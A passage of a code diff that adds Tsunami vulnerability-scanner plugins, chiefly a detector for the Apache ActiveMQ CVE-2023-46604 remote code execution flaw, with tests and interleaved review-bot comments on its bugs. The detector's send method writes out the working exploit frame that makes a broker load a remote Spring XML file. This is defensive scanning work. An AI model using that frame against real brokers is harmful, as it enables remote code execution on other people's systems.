(!payload.getPayloadAttributes().getUsesCallbackServer()) { + return true; + } + useOobVerifyVulnerable = true; + try { + boolean sendPayloadResult = this.sendPayloadToTarget(hp.getHost(), hp.getPort(), payload); + if (!sendPayloadResult) { + logger.atInfo().log("Send payload to target %s failed", hp.toString()); + return false; + } + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + + if (payload.checkIfExecuted()) { + logger.atInfo().log("Target %s is vulnerable", hp.toString()); + return true; + } else { + 
logger.atInfo().log("Target %s is not vulnerable", hp.toString()); + return false; + } + } catch (Exception e) { + logger.atWarning().withCause(e).log("Request to target %s failed", hp.toString()); + } + return false; + } + + // Generate payload for Apache ActiveMQ RCE(CVE-2023-46604), and use socket to send payload + private boolean sendPayloadToTarget(String host, int port, Payload payload) { + try { + String payloadString = payload.getPayload(); + if (!payloadString.startsWith("http://") && !payloadString.startsWith("https://")) { + payloadString = "http://" + payloadString; + } + Socket socket = socketFactory.createSocket(host, port); + OutputStream os = socket.getOutputStream(); + DataOutputStream dos = new DataOutputStream(os); + // Size + dos.writeInt(0); + // Type + dos.writeByte(31); + // CommandId + dos.writeInt(0); + // Command response required + dos.writeBoolean(false); + // CorrelationId + dos.writeInt(0); + // body + dos.writeBoolean(true); + // UTF + dos.writeBoolean(true); + dos.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); + dos.writeBoolean(true); + dos.writeUTF(payloadString); + + dos.close(); + os.close(); + socket.close(); + return true; + } catch (IOException e) { + return false; + } + } + + private String getServerVersion(String serverAddress, int serverPort) { + try { + Socket socket = socketFactory.createSocket(serverAddress, serverPort); + DataInputStream dataInputStream = new DataInputStream(socket.getInputStream()); + byte[] header = new byte[22]; + dataInputStream.readFully(header); + Map maps = MarshallingSupport.unmarshalPrimitiveMap(dataInputStream, 4096); + return maps.get("ProviderVersion").toString(); + } catch (Exception e) { + logger.atWarning().withCause(e).log("Get Target Version Failed"); + return ""; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + TextData details = + TextData.newBuilder().setText("The detected 
software version is " + currentVersion).build(); + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus( + useOobVerifyVulnerable + ? DetectionStatus.VULNERABILITY_VERIFIED + : DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(useOobVerifyVulnerable ? Severity.CRITICAL : Severity.HIGH) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription( + useOobVerifyVulnerable + ? VULN_DESCRIPTION_OF_OOB_VERIFY + : VULN_DESCRIPTION_OF_VERSION) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build(); + } + + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @interface SocketFactoryInstance {} +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java new file mode 100644 index 000000000..742675a65 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java 
@@ -0,0 +1,46 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202346604;
+
+import com.google.inject.Key;
+import com.google.inject.Provides;
+import com.google.inject.multibindings.OptionalBinder;
+import com.google.tsunami.plugin.PluginBootstrapModule;
+import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration;
+import javax.net.SocketFactory;
+
+/** An CVE-2023-46604 Guice module that bootstraps the {@link Cve202346604Detector}. */
+public final class Cve202346604DetectorBootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ OptionalBinder.newOptionalBinder(
+ binder(),
+ Key.get(SocketFactory.class, Cve202346604Detector.SocketFactoryInstance.class))
+ .setDefault()
+ .toInstance(SocketFactory.getDefault());
+ registerPlugin(Cve202346604Detector.class);
+ }
+
+ @Provides
+ @OobSleepDuration
+ int provideOobSleepDuration(Cve202346604DetectorConfigs configs) {
+ if (configs.oobSleepDuration == 0) {
+ return 20;
+ }
+ return configs.oobSleepDuration;
+ }
+}
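Review bot: `provideOobSleepDuration` substitutes the default only when the configured value is exactly 0, so a negative `oobSleepDuration` is returned unchanged. The detector earlier in this diff passes that value to `Duration.ofSeconds(oobSleepDuration)` right before `payload.checkIfExecuted()`; with a negative duration the wait is presumably skipped and the callback is checked immediately, which would report a vulnerable broker as not vulnerable. Treat every non-positive value as unset, `if (configs.oobSleepDuration <= 0) {`, and give the default a name with its unit, e.g. `private static final int DEFAULT_OOB_SLEEP_SECONDS = 20;`.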
diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java
new file mode 100644
index 000000000..bea1438a4
--- /dev/null
+++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java
@@ -0,0 +1,23 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202346604;
+
+import com.google.tsunami.common.config.annotations.ConfigProperties;
+
+@ConfigProperties("plugins.community.detectors.cves.cve202346604")
+final class Cve202346604DetectorConfigs {
+ int oobSleepDuration;
+}
diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java b/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java
new file mode 100644
index 000000000..8f64cf338
--- /dev/null
+++ b/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java
@@ -0,0 +1,300 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forIpAndPort; +import static com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.VULN_DESCRIPTION_OF_OOB_VERIFY; +import static com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.VULN_DESCRIPTION_OF_VERSION; +import static java.nio.charset.StandardCharsets.UTF_8; +import static org.mockito.ArgumentMatchers.anyInt; +import static org.mockito.ArgumentMatchers.anyString; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Guice; +import com.google.inject.Key; +import com.google.inject.multibindings.OptionalBinder; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import 
com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.SocketFactoryInstance; +import com.google.tsunami.proto.*; +import java.io.*; +import java.net.Socket; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Map; +import javax.inject.Inject; +import javax.net.SocketFactory; +import okhttp3.mockwebserver.MockWebServer; +import org.apache.activemq.util.MarshallingSupport; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202346604Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202346604DetectorTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + private final SocketFactory socketFactoryMock = mock(SocketFactory.class); + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final TextData details = + TextData.newBuilder().setText("The detected software version is 5.17.3").build(); + @Inject private Cve202346604Detector detector; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + new AbstractModule() { + @Override + protected void 
configure() { + OptionalBinder.newOptionalBinder( + binder(), Key.get(SocketFactory.class, SocketFactoryInstance.class)) + .setBinding() + .toInstance(socketFactoryMock); + } + }, + Modules.override(new Cve202346604DetectorBootstrapModule()) + .with(BoundFieldModule.of(this)), + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + public void setUpNoOob() throws IOException { + mockCallbackServer.shutdown(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new Cve202346604DetectorBootstrapModule(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(null) + .setSecureRng(testSecureRandom) + .build(), + new AbstractModule() { + @Override + protected void configure() { + OptionalBinder.newOptionalBinder( + binder(), Key.get(SocketFactory.class, SocketFactoryInstance.class)) + .setBinding() + .toInstance(socketFactoryMock); + } + }, + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws Exception { + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 
0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 51 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription(VULN_DESCRIPTION_OF_OOB_VERIFY) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsNoVulnerability() 
throws Exception { + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 54 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, 
ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_whenVulnerableWithoutOob_returnsVulnerability() throws Exception { + this.setUpNoOob(); + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 51 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + 
.setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(Severity.HIGH) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription(VULN_DESCRIPTION_OF_VERSION) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnVersionNotMatch() throws Exception { + OutputStream os = new ByteArrayOutputStream(); + DataOutputStream dos = new DataOutputStream(os); + dos.write(new byte[22]); + MarshallingSupport.marshalPrimitiveMap(Map.of("ProviderVersion", "5.15.17"), dos); + configureMockSocket(os.toString()); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void configureMockSocket(String response) throws Exception { + Socket socket = mock(Socket.class); + when(socketFactoryMock.createSocket(anyString(), 
anyInt())).thenReturn(socket); + when(socket.getOutputStream()).thenReturn(new ByteArrayOutputStream()); + when(socket.getInputStream()).thenReturn(new ByteArrayInputStream(response.getBytes(UTF_8))); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/README.md b/community/detectors/apache_airflow_cve_2020_17526/README.md new file mode 100644 index 000000000..254aa3681 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/README.md @@ -0,0 +1,19 @@ +# Apache Airflow CVE-2020-17526 Detector + +This plugin for Tsunami detects a remote code execution (RCE) vulnerability in a +default DAG of apache airflow UI with the help of CVE-2020-17526, which is an +authentication bypass vulnerability. + +More information on the vulnerability: + +* [CVE-2020-17526](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17526) + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_airflow_cve_2020_17526/build.gradle b/community/detectors/apache_airflow_cve_2020_17526/build.gradle new file mode 100644 index 000000000..5e510ec8e --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/build.gradle 
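Review bot: None of the four tests covers a target whose version cannot be read, and that path looks like a false positive in the detector added earlier in this diff. `getServerVersion` returns `""` on any exception, `checkVersionIsSecure("")` matches no entry in `SECURE_VERSIONS` and returns false, and without a callback server `isServiceVulnerable` then returns true, so a TCP service that does not answer with an OpenWire frame would be reported as `VULNERABILITY_PRESENT`. A version string with fewer than three numeric parts would also reach `parts1[2]` and `Integer.parseInt` unguarded. A test like the one below, added after `detect_whenNotVulnerable_returnVersionNotMatch`, pins the expected behaviour and would fail until the detector treats an unreadable version as not vulnerable.

```java
@Test
public void detect_whenVersionUnreadable_returnsNoVulnerability() throws Exception {
  this.setUpNoOob();
  // Empty stream: readFully(header) fails, so getServerVersion returns "".
  configureMockSocket("");
  NetworkService service =
      NetworkService.newBuilder()
          .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234))
          .setTransportProtocol(TransportProtocol.TCP)
          .setSoftware(Software.newBuilder().setName("ActiveMQ"))
          .build();
  DetectionReportList detectionReports =
      detector.detect(TargetInfo.getDefaultInstance(), ImmutableList.of(service));
  assertThat(detectionReports.getDetectionReportsList()).isEmpty();
}
```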
@@ -0,0 +1,68 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami detector for CVE-2020-17526.'
+group = 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ guiceVersion = '4.2.3'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "com.google.inject:guice:${guiceVersion}"
+ testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
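Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block is a dynamic version, so the three `com.google.tsunami` artifacts resolve to whatever is newest at build time and two builds of the same commit can produce different jars. For a scanner plugin that makes the shipped artifact hard to reproduce or audit; pin an explicit version (`tsunamiVersion = '<pinned-version>'`, placeholder) or turn on Gradle dependency locking. Separately, `'Built-By': System.getProperty('user.name')` writes the builder's account name into the jar manifest and could be dropped from the `attributes(...)` call.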
diff --git a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.jar
similarity index 100%
rename from community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.jar
rename to community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.jar
diff --git a/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..d04736436
--- /dev/null
+++ b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,7 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/community/detectors/mlflow_cve_2023_1177/gradlew b/community/detectors/apache_airflow_cve_2020_17526/gradlew
similarity index 100%
rename from community/detectors/mlflow_cve_2023_1177/gradlew
rename to community/detectors/apache_airflow_cve_2020_17526/gradlew
diff --git a/community/detectors/mlflow_cve_2023_1177/gradlew.bat b/community/detectors/apache_airflow_cve_2020_17526/gradlew.bat
similarity index 100%
rename from community/detectors/mlflow_cve_2023_1177/gradlew.bat
rename to community/detectors/apache_airflow_cve_2020_17526/gradlew.bat
diff --git a/community/detectors/apache_airflow_cve_2020_17526/settings.gradle b/community/detectors/apache_airflow_cve_2020_17526/settings.gradle
new file mode 100644
index 000000000..b22f0def3
--- /dev/null
+++ b/community/detectors/apache_airflow_cve_2020_17526/settings.gradle
@@ -0,0 +1 @@
+rootProject.name = 'cve202017526'
diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java
new file mode 100644
index 000000000..7626174d0
--- /dev/null
+++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.cve202017526;
+
+import static java.lang.annotation.ElementType.FIELD;
+import static java.lang.annotation.ElementType.METHOD;
